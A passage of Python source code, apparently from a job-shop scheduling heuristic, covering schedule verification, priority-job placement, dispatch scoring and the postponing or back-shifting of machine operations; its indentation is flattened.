for machine_temp in self.name_macs:
self.count_scheduled_op_macs[machine_temp] = 0
# for machine_temp in key_job_list:
#---------------- Verification ----------------#
penalty_pending_constraint = 0
for ind_job_check in range(self.num_job):
name_job_check = self.name_jobs[ind_job_check]
type_job_check = self.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
if self.flag_scheduled_jobs[ind_job_check] != 1:
print('unscheduled job')
# if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( self.num_op_jobs[ind_job_check] )
idx_first_op_job_check = self.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if self.flag_scheduled_ops[op_check] != 1:
print('unscheduled_ operation')
# if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
if ind_op_job_check > 0:
if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
print('incorrect start time')
# if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = self.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = self.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else:
time_comp = self.end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if self.start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (self.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
for machine_temp in machine_status:
len_op_seq = len(self.op_seq_machines[machine_temp])
for ind_op_seq in range(len_op_seq-1):
if self.end_time_op_macs[machine_temp][ind_op_seq] > self.start_time_op_macs[machine_temp][ind_op_seq+1]:
print('Incorrect start time')
# if new_end_time_op_macs[machine_temp][ind_op_seq] > new_start_time_op_macs[machine_temp][ind_op_seq+1]:
# for ind_op_seq in range(len_op_seq-1):
# for machine_temp in machine_status:
print('checkpoint')
# def init_construction(self, job_status, job_list, machine_status):
def generation_scratch(self, cur_time, job_status, machine_status, coeff_tardiness, rnd_mode):
#---------------- Priority ----------------#
op_seq_machines = {}
job_seq_machines = {}
start_time_op_macs = {}
end_time_op_macs = {}
mac_assignment_ops = {}
flag_scheduled_ops = np.zeros(self.total_num_ops)
# key_job_list = job_list.keys()
# ready_time_macs = {} # np.zeros(self.total_num_machines)
op_anchor_type_macs = {}
for machine_temp in self.name_macs:
op_seq_machines[machine_temp] = []
job_seq_machines[machine_temp] = []
start_time_op_macs[machine_temp] = []
end_time_op_macs[machine_temp] = []
op_anchor_type_macs[machine_temp] = -1
# ready_time_macs[machine_temp] = 0
# for machine_temp in self.name_macs:
flag_scheduled_jobs = np.zeros(self.num_job)
start_time_ops = -1 * np.ones(self.total_num_ops)
end_time_ops = -1 * np.ones(self.total_num_ops)
ready_time_type_macs = {}
scheduled_length_mac_types = {}
for machine_type_temp in self.machines:
ready_time_type_macs[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp]) # [0 for _ in range(self.num_machine_types[machine_type_temp])]
scheduled_length_mac_types[machine_type_temp] = 0
# for machine_type_temp in self.machines:
occupy_time_type_macs = {}
for mac_type_temp in self.machines:
occupy_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
# for mac_type_temp in self.machines:
for ind_set_job_priority in range(self.size_set_job_priority):
name_job_priority = self.set_job_priority[ind_set_job_priority]
idx_job_priority = int( self.idx_set_job_priority[name_job_priority] )
type_job_priority = self.type_jobs[idx_job_priority]
num_op_job_priority = int( self.num_op_jobs[idx_job_priority] )
idx_first_op_job_priority = self.idx_first_op_jobs[idx_job_priority]
job_constraint_temp = self.arrival_jobs_priority[name_job_priority]
for ind_op_job_priority in range(num_op_job_priority):
idx_op_schedule = int( idx_first_op_job_priority + ind_op_job_priority )
mac_type_op_schedule = self.machine_type_ops[idx_op_schedule]
process_time_op_schedule = self.process_time_mac_jobs[mac_type_op_schedule][type_job_priority]
pend_time_op_schedule = self.job_types[type_job_priority][ind_op_job_priority]['max_pend_time']
# start_time_final = -1
# ind_position_final = -1
count_attempt = 0
num_mac_same_type = self.num_machine_types[mac_type_op_schedule]
idx_mac_op_schedule = np.argmin(occupy_time_type_macs[mac_type_op_schedule])
if rnd_mode == 1:
idx_mac_op_schedule = random.randint(0, num_mac_same_type-1)
# if rnd_mode == 1:
while count_attempt < num_mac_same_type:
mac_op_schedule = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
ind_position_op_schedule = 0
start_time_candidate = -1
while ind_position_op_schedule < len(start_time_op_macs[mac_op_schedule]):
start_time_candidate = job_constraint_temp
if ind_position_op_schedule > 0:
if end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
start_time_candidate = end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1]
# if start_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
# if ind_position_op_schedule > 0:
if start_time_candidate + process_time_op_schedule <= start_time_op_macs[mac_op_schedule][ind_position_op_schedule]:
break
# if start_time_candidate + pend_time_op_schedule <= start_time_op_macs[mac_op_schedule][ind_position_op_schedule]:
ind_position_op_schedule = ind_position_op_schedule + 1
# while ind_position_op_schedule < len(start_time_op_macs[mac_op_schedule]):
if ind_position_op_schedule == len(start_time_op_macs[mac_op_schedule]):
start_time_candidate = job_constraint_temp
if ind_position_op_schedule > 0:
if end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
start_time_candidate = end_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1]
# if start_time_op_macs[mac_op_schedule][ind_position_op_schedule - 1] > start_time_candidate:
# if ind_position_op_schedule > 0:
# if ind_position_op_schedule == len(start_time_op_macs[mac_op_schedule]):
if start_time_candidate == -1:
print('incorrect start time')
# if start_time_candidate == -1:
if start_time_candidate > job_constraint_temp + pend_time_op_schedule:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
else:
# start_time_final = start_time_candidate
# ind_position_final = ind_position_op_schedule
break
# if start_time_candidate > job_constraint_temp + pend_time_op_schedule:
# while count_attempt < num_mac_same_type
start_time_ops[idx_op_schedule] = start_time_candidate
end_time_ops[idx_op_schedule] = start_time_candidate + process_time_op_schedule
op_seq_machines[mac_op_schedule].insert(ind_position_op_schedule, idx_op_schedule)
job_seq_machines[mac_op_schedule].insert(ind_position_op_schedule, name_job_priority)
start_time_op_macs[mac_op_schedule].insert(ind_position_op_schedule, start_time_candidate)
end_time_op_macs[mac_op_schedule].insert(ind_position_op_schedule, end_time_ops[idx_op_schedule])
mac_assignment_ops[idx_op_schedule] = mac_op_schedule
flag_scheduled_ops[idx_op_schedule] = 1
scheduled_length_mac_types[mac_type_op_schedule] = scheduled_length_mac_types[mac_type_op_schedule] + process_time_op_schedule
occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] = occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] + process_time_op_schedule
job_constraint_temp = end_time_ops[idx_op_schedule]
# for ind_op_job_priority in range(num_op_job_priority):
flag_scheduled_jobs[idx_job_priority] = 1
# for ind_job_priority in range(size_set_job_priority):
#---------------- Division ----------------#
average_length_machine_type = {}
max_average_length = -1
# mac_type_max_average_length = None
for machine_temp in self.machines:
coeff_temp = 1.0 # + ind_mac_type_temp / 10.0
average_length_machine_type[machine_temp] = self.total_length_machine_type[machine_temp] * coeff_temp / self.num_machine_available_types[machine_temp]
if average_length_machine_type[machine_temp] > max_average_length:
max_average_length = average_length_machine_type[machine_temp]
# mac_type_max_average_length = machine_temp
# if average_length_machine_type[machine_temp] > max_average_length:
# for machine_temp in self.machines:
# num_mac_max_average_length = self.num_machine_available_types[mac_type_max_average_length]
num_left_job = np.zeros(self.num_job_types)
for ind_job_type in range(self.num_job_types):
job_type_temp = self.keys_job_types[ind_job_type]
num_left_job[ind_job_type] = self.num_jobs_type_idx[job_type_temp] - self.num_type_job_priority[ind_job_type]
if num_left_job[ind_job_type] < 0:
print('incorrect number of jobs')
# if num_dispatch_temp < 0:
# for ind_job_type in range(self.num_job_types):
#---------------- Dispatch ----------------#
# num_job_dispatch_mac = group_job_mac.copy()
pos_insertion_macs = {}
op_priority_ref_macs = {}
for mac_type_temp in self.machines:
num_mac_type_temp = self.num_machine_types[mac_type_temp]
# pos_insertion_type_mac[mac_type_temp] = np.zeros(num_mac_type_temp)
for ind_mac_type in range(num_mac_type_temp):
mac_name_temp = self.machines[mac_type_temp][ind_mac_type]
pos_insertion_macs[mac_name_temp] = 0
if len(op_seq_machines[mac_name_temp]) > 0:
op_priority_ref_macs[mac_name_temp] = int( op_seq_machines[mac_name_temp][0] )
else: # len(op_seq_machines[mac_name_temp]) == 0:
op_priority_ref_macs[mac_name_temp] = -1
# if len(op_seq_machines[mac_name_temp]) > 0:
# for ind_mac_type in range(num_mac_type_temp):
# for mac_type_temp in self.machines:
while np.sum(flag_scheduled_jobs) < self.num_job:
# machine set
mac_available_set = {}
ind_mac_available_set = {}
buffer_macs = {}
ready_time_comp = -1
# idx_mac_max_length = -1
for machine_type_temp in self.machines:
ind_mac_type_mac = np.argmin( ready_time_type_macs[machine_type_temp] )
mac_selected_temp = self.machines[machine_type_temp][ind_mac_type_mac]
mac_available_set[machine_type_temp] = mac_selected_temp
ind_mac_available_set[machine_type_temp] = ind_mac_type_mac
if ready_time_comp == -1:
buffer_macs[machine_type_temp] = 0
ready_time_comp = ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
else:
ready_time_cur = ready_time_type_macs[machine_type_temp][ind_mac_type_mac]
buffer_macs[machine_type_temp] = ready_time_cur - ready_time_comp
ready_time_comp = ready_time_cur
# if ready_time_comp == -1:
# for machine_temp in self.machines:
# grade the type of jobs
status_job = 3 * np.ones(self.num_job_types)
score_job = np.zeros((self.num_job_types, 2))
for ind_job_type in range(self.num_job_types):
if num_left_job[ind_job_type] <= 0:
continue
# if num_job_dispatch_mac[idx_mac_max_length, ind_job_type] <= 0:
job_type_temp = self.keys_job_types[ind_job_type]
# sentinel_tardiness = False
# score_consume = np.zeros(self.num_kind_mac-1)
score_comb = np.zeros(self.num_kind_mac)
score_tardiness = np.zeros(self.num_kind_mac)
job_constraint_score = 0
for ind_op_temp in range(self.num_kind_mac):
mac_type_cur = self.keys_mac_types[ind_op_temp]
idx_mac_cur = ind_mac_available_set[mac_type_cur]
mac_score = mac_available_set[mac_type_cur]
process_time_cur_mac = self.process_time_mac_jobs[mac_type_cur][job_type_temp]
if process_time_cur_mac == -1:
process_time_cur_mac = 0
# if process_time_cur_mac == -1:
urgence_coeff_temp = (1.0 + ind_op_temp * 0.2) * (self.total_length_machine_type[mac_type_cur] - scheduled_length_mac_types[mac_type_cur]) / self.num_machine_available_types[mac_type_cur]
start_time_score = job_constraint_score
if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
start_time_score = ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score < ready_time_type_macs[mac_type_cur][idx_mac_cur]:
tardiness_temp = start_time_score - ready_time_type_macs[mac_type_cur][idx_mac_cur]
op_priority_score = op_priority_ref_macs[mac_score]
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
if start_time_score + process_time_cur_mac > start_time_ops[op_priority_score] + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
start_time_score = end_time_ops[op_priority_score]
tardiness_temp = start_time_ops[op_priority_score] - ready_time_type_macs[mac_type_cur][idx_mac_cur]
# if start_time_score + process_time_cur_mac < start_time_ops[op_priority_score]:
# if op_priority_score != -1
if tardiness_temp > 0:
# sentinel_tardiness = True
score_tardiness[ind_op_temp] = - tardiness_temp * urgence_coeff_temp
# else:
if op_priority_score != -1:
max_pend_time_op_priority_score = self.max_pend_time_ops[op_priority_score]
length_left = start_time_ops[op_priority_score] - start_time_score - process_time_cur_mac
if length_left > 0:
if length_left < self.length_comb_macs[mac_type_cur][0]:
score_comb[ind_op_temp] = - length_left * urgence_coeff_temp
elif length_left < self.max_length_comb:
idx_plus = -1
for ind_length_comb in range(len(self.length_comb_macs[mac_type_cur])):
if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
idx_plus = ind_length_comb
break
# end if self.length_comb_macs[mac_type_cur][ind_length_comb] > length_left:
# end for ind_length_comb in len(self.length_comb_macs[mac_type_cur]):
if idx_plus == 0:
print('incorrect index')
elif idx_plus != -1:
length_plus = self.length_comb_macs[mac_type_cur][idx_plus]
length_minus = self.length_comb_macs[mac_type_cur][idx_plus-1]
if length_left > length_minus + 0.1 * self.perc_pend_time * max_pend_time_op_priority_score:
score_comb[ind_op_temp] = - (length_plus - length_left) * urgence_coeff_temp
# end if length_left > length_minus + 0.5 * self.perc_pend_time * max_pend_time_op_priority_score:
# end if idx_plus == 0 or idx_plus == -1:
# end if length_left < self.length_comb_macs[mac_type_cur][0]:
# if length_left > 0:
# if op_priority_score != -1
# if tardiness_temp > 0:
job_constraint_score = start_time_score + process_time_cur_mac
# for ind_op_temp in range(1, num_op_job_temp):
status_job[ind_job_type] = 2
score_job[ind_job_type, 1] = coeff_tardiness * np.sum(score_tardiness) + np.sum(score_comb)
# if sentinel_tardiness == True:
# status_job[ind_job_type] = 2
# score_job[ind_job_type, 1] = np.sum(score_tardiness)
# else:
# status_job[ind_job_type] = 1
# score_job[ind_job_type, 0] = np.sum(score_comb)
# # if sentinel_tardiness == True:
# for ind_job_type in range(self.num_job_types):
# select the type of job
# idx_mac_job_group = idx_mac_max_length
idx_job_type_selected = -1
ind_job_selected = -1
# idx_job_type_first_arrive = -1
# sentinel_job_type = np.zeros(self.num_job_types)
idx_job_type_selected = -1
for ind_job_type in range(self.num_job_types):
if status_job[ind_job_type] >= 3: # or sentinel_job_type[ind_job_type] == 1
continue
# if status_job[ind_job_type] >= 4:
if idx_job_type_selected == -1:
idx_job_type_selected = ind_job_type
else: # if idx_job_type_selected != -1:
if status_job[ind_job_type] < status_job[idx_job_type_selected]:
idx_job_type_selected = ind_job_type
else:
if status_job[ind_job_type] == status_job[idx_job_type_selected]:
if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 2 and score_job[ind_job_type,1] > score_job[idx_job_type_selected,1]:
if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
idx_job_type_selected = ind_job_type
# if status_job[ind_job_type] == 1 and score_job[ind_job_type,0] > score_job[idx_job_type_selected,0]:
# if status_job[ind_job_type] == status_job[idx_job_type_selected]:
# if status_job[ind_job_type] < status_job[idx_job_type_selected]:
# if idx_job_type_selected == -1:
# for ind_job_type in range(self.num_job_types):
if idx_job_type_selected == -1:
print('No proper job type')
# if idx_job_type_selected == -1:
# determine the exact job to be arranged
job_type_selected = self.keys_job_types[idx_job_type_selected]
idx_job_base = self.idx_first_job_types[job_type_selected]
job_name_selected = None
for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1:
continue
# if flag_scheduled_jobs[idx_job_base + ind_job_selected_type] == 1 or self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > 0:
continue
# if self.arrival_time_jobs[idx_job_base + ind_job_selected_type] > current_time:
if ind_job_selected == -1:
ind_job_selected = ind_job_selected_type + idx_job_base
job_name_selected = self.name_jobs[ind_job_selected]
break
# if ind_job_selected == -1:
# for ind_job_selected_type in range(self.num_jobs_type_idx[job_type_selected]):
if job_type_selected != self.type_jobs[ind_job_selected]:
print('check job type')
# if job_type_selected != self.type_jobs[ind_job_selected]:
if ind_job_selected == -1:
print('No proper job')
# if ind_job_selected == -1:
# dispatch
job_constraint_temp = self.arrival_time_jobs[ind_job_selected]
ind_first_op_temp = self.idx_first_op_jobs[ind_job_selected]
job_name_selected = self.name_jobs[ind_job_selected]
num_op_temp = int( self.num_op_jobs[ind_job_selected] )
for ind_op_job_temp in range(num_op_temp):
ind_op_schedule = int( ind_first_op_temp + ind_op_job_temp )
mac_type_temp = self.machine_type_ops[ind_op_schedule]
process_time_temp = self.job_types[job_type_selected][ind_op_job_temp]['process_time']
ind_mac_type_mac_temp = ind_mac_available_set[mac_type_temp]
mac_name_temp = mac_available_set[mac_type_temp]
# determine the start time
start_time_candidate = job_constraint_temp
if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
start_time_candidate = ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]
# if job_constraint_temp < ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp]:
pos_insert_op_schedule = pos_insertion_macs[mac_name_temp]
op_priority_ref = op_priority_ref_macs[mac_name_temp]
while op_priority_ref != -1:
max_pend_time_op_priority_ref = self.max_pend_time_ops[op_priority_ref]
if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
break
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref]:
ind_job_priority = self.ind_job_ops[op_priority_ref]
ind_op_op_priority = self.ind_op_ops[op_priority_ref]
job_constraint_op_priority = self.arrival_time_jobs[ind_job_priority]
if ind_op_op_priority > 0:
job_constraint_op_priority = end_time_ops[op_priority_ref - 1]
# if ind_op_op_priority > 0:
if start_time_candidate < start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp > start_time_ops[op_priority_ref] and start_time_candidate + process_time_temp <= job_constraint_op_priority + max_pend_time_op_priority_ref * self.perc_pend_time:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial = self.postpone_operation(cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs)
if sentinel_feasible == True:
start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
ready_time_type_macs = ready_time_type_macs_trial # copy.deepcopy(ready_time_type_macs)
break
# if sentinel_feasible == True:
# if start_time_candidate + process_time_temp <= start_time_ops[op_priority_ref] + max_pend_time_op_priority_ref:
if end_time_ops[op_priority_ref] > start_time_candidate:
start_time_candidate = end_time_ops[op_priority_ref]
# if end_time_ops[op_priority_ref] > start_time_candidate:
pos_insert_op_schedule = pos_insert_op_schedule + 1
while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp]):
op_temp = op_seq_machines[mac_name_temp][pos_insert_op_schedule]
ind_job_op_temp = int( self.ind_job_ops[op_temp] )
job_temp = self.name_jobs[ind_job_op_temp]
if job_status[job_temp]['priority'] > 0:
op_priority_ref = op_temp
break
# if job_status[job_temp]['priority'] > 0:
pos_insert_op_schedule = pos_insert_op_schedule + 1
# while pos_insert_op_schedule < len(op_seq_machines[mac_name_temp])
if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
op_priority_ref = -1
break
# if pos_insert_op_schedule >= len(op_seq_machines[mac_name_temp]):
# while op_priority_ref != -1:
pos_insertion_macs[mac_name_temp] = pos_insert_op_schedule
op_priority_ref_macs[mac_name_temp] = op_priority_ref
start_time_ops[ind_op_schedule] = start_time_candidate
end_time_ops[ind_op_schedule] = start_time_ops[ind_op_schedule] + process_time_temp # self.job_types[job_type_init][ind_op_job_temp]['process_time']
op_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, ind_op_schedule)
job_seq_machines[mac_name_temp].insert(pos_insert_op_schedule, job_name_selected)
start_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, start_time_ops[ind_op_schedule])
end_time_op_macs[mac_name_temp].insert(pos_insert_op_schedule, end_time_ops[ind_op_schedule])
ready_time_type_macs[mac_type_temp][ind_mac_type_mac_temp] = end_time_ops[ind_op_schedule]
op_anchor_type_macs[mac_name_temp] = ind_op_schedule
scheduled_length_mac_types[mac_type_temp] = scheduled_length_mac_types[mac_type_temp] + process_time_temp
mac_assignment_ops[ind_op_schedule] = mac_name_temp
flag_scheduled_ops[ind_op_schedule] = 1
pos_insertion_macs[mac_name_temp] = pos_insertion_macs[mac_name_temp] + 1
job_constraint_temp = end_time_ops[ind_op_schedule]
# for ind_op_job_temp in range(num_op_temp):
flag_scheduled_jobs[ind_job_selected] = 1
num_left_job[idx_job_type_selected] = num_left_job[idx_job_type_selected] - 1
if num_left_job[idx_job_type_selected] < 0:
print('the number of jobs is less than zero')
# if num_job_dispatch_mac[idx_mac_job_group, idx_job_type_selected] < 0:
# while np.sum(flag_scheduled_jobs) < self.num_job:
#---------------- Recording ----------------#
op_max_end_time = np.argmax(end_time_ops)
makespan = end_time_ops[op_max_end_time] # np.max(end_time_ops)
return makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs
# def generation_scratch(self, cur_time, job_status, machine_status):
def postpone_operation(self, cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs):
sentinel_feasible = True
start_time_ops_trial = copy.deepcopy(start_time_ops)
end_time_ops_trial = copy.deepcopy(end_time_ops)
start_time_op_macs_trial = copy.deepcopy(start_time_op_macs)
end_time_op_macs_trial = copy.deepcopy(end_time_op_macs)
ready_time_type_macs_trial = copy.deepcopy(ready_time_type_macs)
# update the start time and the end time of the postponed operation
ind_job_op_priority_ref = self.ind_job_ops[op_priority_ref]
ind_op_op_priority_ref = self.ind_op_ops[op_priority_ref]
mac_op_priority_ref = mac_assignment_ops[op_priority_ref]
process_time_op_priority_ref = self.process_time_ops[op_priority_ref]
start_time_ops_trial[op_priority_ref] = start_time_candidate + process_time_temp
end_time_ops_trial[op_priority_ref] = start_time_ops_trial[op_priority_ref] + process_time_op_priority_ref
if op_priority_ref not in op_seq_machines[mac_op_priority_ref]:
print('wrong processing sequence')
# if op_priority_ref not in op_seq_machines[mac_op_priority_ref]:
idx_seq_op_priority_ref = op_seq_machines[mac_op_priority_ref].index(op_priority_ref)
start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref] = start_time_ops_trial[op_priority_ref]
end_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref] = end_time_ops_trial[op_priority_ref]
# simulate the influence
mac_influence_list = []
ind_influence_list = []
if idx_seq_op_priority_ref + 1 < len(op_seq_machines[mac_op_priority_ref]):
if end_time_ops_trial[op_priority_ref] > start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref + 1]:
mac_influence_list.append(mac_op_priority_ref)
ind_influence_list.append(idx_seq_op_priority_ref + 1)
# if end_time_ops_trial[op_priority_ref] > start_time_op_macs_trial[mac_op_priority_ref][idx_seq_op_priority_ref + 1]:
# if idx_seq_op_priority_ref + 1 < len(op_seq_machines[mac_op_priority_ref]):
if ind_op_op_priority_ref + 1 < self.num_op_jobs[ind_job_op_priority_ref]:
op_suc_temp = op_priority_ref + 1
if start_time_ops_trial[op_suc_temp] != -1:
if end_time_ops_trial[op_priority_ref] > start_time_ops_trial[op_suc_temp]:
mac_op_suc = mac_assignment_ops[op_suc_temp]
idx_seq_op_suc = op_seq_machines[mac_op_suc].index(op_suc_temp)
mac_influence_list.append(mac_op_suc)
ind_influence_list.append(idx_seq_op_suc)
# if end_time_ops_trial[op_priority_ref] > start_time_ops_trial[op_suc_temp]:
# if start_time_ops_trial[op_suc_temp] != -1:
# if ind_op_op_priority_ref + 1 < self.num_op_jobs[ind_job_op_priority_ref]:
while len(mac_influence_list) > 0:
mac_alter_op = mac_influence_list[0]
idx_alter_op = ind_influence_list[0]
op_alter = op_seq_machines[mac_alter_op][idx_alter_op]
ind_job_op_alter = self.ind_job_ops[op_alter]
# name_job_op_alter = self.name_jobs[ind_job_op_alter]
# job_type_op_alter = self.type_jobs[ind_job_op_alter] # job_status[name_job_op_alter]['type']
ind_op_op_alter = self.ind_op_ops[op_alter]
process_time_alter = self.process_time_ops[op_alter] # self.job_types[job_type_op_alter][ind_op_op_alter]['process_time']
if idx_alter_op > 0:
start_time_ops_trial[op_alter] = end_time_op_macs_trial[mac_alter_op][idx_alter_op - 1]
else:
start_time_ops_trial[op_alter] = 0
# if idx_alter_op > 0:
max_pend_time_op_alter = self.max_pend_time_ops[op_alter]
job_constraint_op_alter = self.arrival_time_jobs[ind_job_op_alter]
if ind_op_op_alter > 0:
job_constraint_op_alter = end_time_ops_trial[op_alter - 1]
# if ind_op_op_alter > 0:
if job_constraint_op_alter > start_time_ops_trial[op_alter]:
start_time_ops_trial[op_alter] = job_constraint_op_alter
# if end_time_ops[op_alter - 1] >
if start_time_ops_trial[op_alter] < cur_time:
start_time_ops_trial[op_alter] = cur_time
# if start_time_ops_trial[op_alter] < cur_time:
if self.priority_jobs[ind_job_op_alter] > 0 and start_time_ops_trial[op_alter] > job_constraint_op_alter + max_pend_time_op_alter:
sentinel_feasible = False
break
# if start_time_ops_trial[op_alter] > job_constraint_op_alter + max_pend_time_op_alter:
end_time_ops_trial[op_alter] = start_time_ops_trial[op_alter] + process_time_alter
start_time_op_macs_trial[mac_alter_op][idx_alter_op] = start_time_ops_trial[op_alter]
end_time_op_macs_trial[mac_alter_op][idx_alter_op] = end_time_ops_trial[op_alter]
mac_type_op_alter = machine_status[mac_alter_op]['type']
hash_ind_mac_op_alter = self.hash_ind_mac_types[mac_alter_op]
if op_anchor_type_macs[mac_alter_op] == op_alter:
ready_time_type_macs_trial[mac_type_op_alter][hash_ind_mac_op_alter] = end_time_ops_trial[op_alter]
# if op_anchor_type_macs[mac_alter_op] == op_alter:
if idx_alter_op + 1 < len(op_seq_machines[mac_alter_op]):
if end_time_ops_trial[op_alter] > start_time_op_macs_trial[mac_alter_op][idx_alter_op + 1]:
mac_influence_list.append(mac_alter_op)
ind_influence_list.append(idx_alter_op+1)
# if end_time_ops_trial[op_alter] > start_time_op_macs_trial[mac_alter_op][idx_alter_op + 1]:
# if idx_alter_op + 1 == len(op_seq_machines[mac_alter_op]):
if ind_op_op_alter + 1 < self.num_op_jobs[ind_job_op_alter]:
op_suc_temp = op_alter + 1
if start_time_ops_trial[op_suc_temp] != -1:
if end_time_ops_trial[op_alter] > start_time_ops_trial[op_suc_temp]:
mac_op_suc = mac_assignment_ops[op_suc_temp]
pos_op_suc = op_seq_machines[mac_op_suc].index(op_suc_temp)
mac_influence_list.append(mac_op_suc)
ind_influence_list.append(pos_op_suc)
# if end_time_ops[op_alter] >
# if start_time_ops_trial[op_suc_temp] != -1:
# if ind_op_op_alter + 1 < self.num_op_jobs[ind_job_op_alter]:
mac_influence_list.pop(0)
ind_influence_list.pop(0)
# while len(mac_influence_list) > 0:
return sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial, ready_time_type_macs_trial
# def postpone_operation(self, cur_time, machine_status, op_priority_ref, start_time_candidate, process_time_temp, start_time_ops, end_time_ops, start_time_op_macs, end_time_op_macs, ready_time_type_macs, mac_assignment_ops, op_seq_machines, op_anchor_type_macs):
def priority_backward(self, cur_time, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, ind_op_job_priority, start_time_candidate, pend_time_op_schedule, idx_first_op_job_priority, idx_job_priority, new_mac_assignment_ops, new_op_seq_machines):
sentinel_feasible = False
start_time_ops_trial = copy.deepcopy(new_start_time_ops)
end_time_ops_trial = copy.deepcopy(new_end_time_ops)
start_time_op_macs_trial = copy.deepcopy(new_start_time_op_macs)
end_time_op_macs_trial = copy.deepcopy(new_end_time_op_macs)
# ready_time_type_macs_trial = copy.deepcopy(ready_time_type_macs)
ind_op_backward = ind_op_job_priority - 1
start_time_op_cur = start_time_candidate
pend_time_op_cur = pend_time_op_schedule
while ind_op_backward >= 0:
op_pred = int(idx_first_op_job_priority + ind_op_backward)
earliest_end_time_op_pred = start_time_op_cur - pend_time_op_cur
earliest_start_time_op_pred = earliest_end_time_op_pred - self.process_time_ops[op_pred]
mac_op_pred = new_mac_assignment_ops[op_pred]
pos_mac_op_pred = new_op_seq_machines[mac_op_pred].index(op_pred)
if start_time_ops_trial[op_pred] < cur_time or earliest_start_time_op_pred < cur_time:
break
# if new_start_time_ops[op_pred] < cur_time:
if start_time_ops_trial[op_pred] > earliest_start_time_op_pred:
print('incorrect backward')
else:
start_time_ops_trial[op_pred] = earliest_start_time_op_pred
end_time_ops_trial[op_pred] = earliest_end_time_op_pred
start_time_op_macs_trial[mac_op_pred][pos_mac_op_pred] = earliest_start_time_op_pred
end_time_op_macs_trial[mac_op_pred][pos_mac_op_pred] = earliest_end_time_op_pred
# if new_start_time_ops[op_pred] > earliest_start_time_op_pred:
job_constraint_op_pred = self.arrival_time_jobs[idx_job_priority]
if ind_op_backward > 0:
job_constraint_op_pred = end_time_ops_trial[op_pred-1]
# if ind_op_backward > 0:
pend_time_op_pred = self.max_pend_time_ops[op_pred]
if earliest_start_time_op_pred <= job_constraint_op_pred + pend_time_op_pred:
sentinel_feasible = True
break
